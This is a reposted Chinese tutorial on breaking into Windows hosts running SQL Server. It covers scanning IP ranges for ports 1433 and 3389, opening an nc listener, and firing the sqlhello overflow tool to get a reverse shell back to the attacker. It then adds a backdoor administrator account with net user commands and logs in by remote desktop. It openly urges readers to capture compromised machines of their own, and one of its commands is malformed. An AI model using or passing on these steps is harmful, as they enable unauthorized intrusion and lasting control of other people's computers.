欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

黑客如何入侵装有SQL数据库的电脑主机

程序员文章站 2022-03-12 17:44:01
近些年来,计算机的安全性能,曾突飞猛进的上升势头。导致以前网络,遍地都是的弱口令肉鸡,现在早已消失的不知去向。可见其安全的提升程度,难道菜鸟抓取肉鸡成为了“天方夜潭”?当... 08-10-08...
近些年来,计算机的安全性能,曾突飞猛进的上升势头。导致以前网络,遍地都是的弱口令肉鸡,现在早已消失的不知去向。可见其安全的提升程度,难道菜鸟抓取肉鸡成为了“天方夜潭”?当然答案是否定的,具体如何获取肉鸡请看下文所示!
  小提示:肉鸡是指在网络上,已经被你成功入侵的主机,并且这台机器完全受控于入侵者的任意操作,如同本机操控一样的直观顺手。
  一、踩点扫描——寻找目标
  俗话说:知己知彼,百战百胜!这里在网络中攻破一台主机,也是同样的道理,或者换句话说:拥有一款超强扫描的刺探工具,才是您能否走向入侵成功的关键。
  首先笔者从网上下载大名鼎鼎的superscan端口扫描工具(下载地址:http://www.yezie.com/down/list.aspx?id=109229),操作完毕后,双击解压出来的“主程序”图标,弹出superscan工具操作界面(如图1)。然后在左边“开始ip”以及stop(结束)ip标签处,输入想要查找的肉鸡ip网段,在选取扫描的服务。单击右上角“端口列表设置”按钮,进入“自定义端口”窗体,在“端口”标签处,输入1433的端口数字,单击“增加”按钮,编辑区就会出现红色字体的1433端口,在双击其数字,前面会有一个"√"的标志,证明该端口已经添加完毕,然后在按照上一步添加端口的步骤,将3389端口也填入到其中。在单击“保存”按钮,选择端口为端口列表,会顺“原路”返回到主界面。在扫描类型内选择all selected port in list单选框,点击“开始”按钮,检测启动。稍等一会后,在所设立的网段中,符合要求的主机,会立刻“浮现”在下方编辑区域内。
黑客如何入侵装有SQL数据库的电脑主机
图 1
二、天罗地网——监听端口
  既然“柔弱”的主机,都已被扫描器“撕破了脸皮揭晓”,接下来要做的就是布下“天罗地网”,等待那些含有漏洞的目标主机“自投罗网”,布置所用的工具——瑞士军刀nc监听。
  为了方便本文以下讲解,笔者已经将其下载到本地i盘符,然后单击“开始”菜单,选择“运行”选项。在出现的“打开”标签处,输入cmd字符命令,并且敲击“回车”键,会立即弹出“命令行”式对话框。在光标闪烁处敲入dos跳转命令,进入到nc工具所在的目录,开始执行该软件所提供的监听功能,这里输入nc –v v –l –p 1987的命令回车,如果命令行下出现等待的“省略号”提示信息(如图2),证明已经成功,监听本机1987端口。
黑客如何入侵装有SQL数据库的电脑主机
图 2
  小提示:nc软件里的-vv参数代表,得到更详细的输入监听内容。-l代表连接端口关闭后,仍然继续监听。-p进行监听本地端口,后跟数字就是所要监听的端口号。
  三、驱赶肉鸡——进入所布下的陷阱
  等待肉鸡上门,自然不是聪明的办法,更不知道何时,才能有主机访问到本地布下的“网罩”。所以要使用sqlhello攻击工具的功能,驱赶目标机器强行“重招”,来加速其访问“陷阱”的效率。
  此时,将正在监听的命令窗体,呈最下化模式,回到windows图形化操作界面。然后在硬盘驱动器中,找到笔者事先下载的sqlhello溢出工具所在目录,你会发现与以往工具目录,不同的是多出一个1.bat批处理文件,其实这是sqlhello溢出工具的执行台,在以“编辑”选项的形式打开。输入其格式为sqlhello 目标主机ip 1433 本机ip 监听端口的命令(如图3),单击右上角“关闭”按钮,保存其文件内容结束。操作完毕后,再次双击1.bat批处理文件,会快速的闪过dos命令窗体,可见该批处理已经操控着sqlhello工具,开始溢出攻击了。然后回到还在监听的nc命令窗体,等待的省略号已经变为了系统的shell,这也正是远程主机的命令控制台。
黑客如何入侵装有SQL数据库的电脑主机
图 3
  小提示:shell是操作系统的最外层,管理着你与操作系统交互、通讯、执行等工作的操作,假设你已经得到了对方的shell,也就代表着你拥有了与对方计算机直接沟通、下达命令的平台。
  在其命令行下输入net user administrators wenpeng 123456 /add的命令,就可以建立一个属于自己名为“wenpeng”,密码是123456的普通帐户。在将所建用户的权限提升为管理员,敲入net localgroup administrators wenpeng /add命令回车,即可提示命令成功完成的内容。最后使用本机自带的远程终端软件,敲入刚才溢出的ip以及建立/提升的用户,进行“远程连接”登录,稍等片刻后,屏幕会立即出现非常直观的肉鸡桌面(如图4)。
黑客如何入侵装有SQL数据库的电脑主机
图 4
  可见目前已被攻破的主机,在让笔者任由“摆步”的同时,还可以像操作本机一样得心应手。相信这样理想的肉鸡,您一定不会错过。何不一同依照本文所提供的方法,来获取自己“梦寐以求”的肉鸡呢?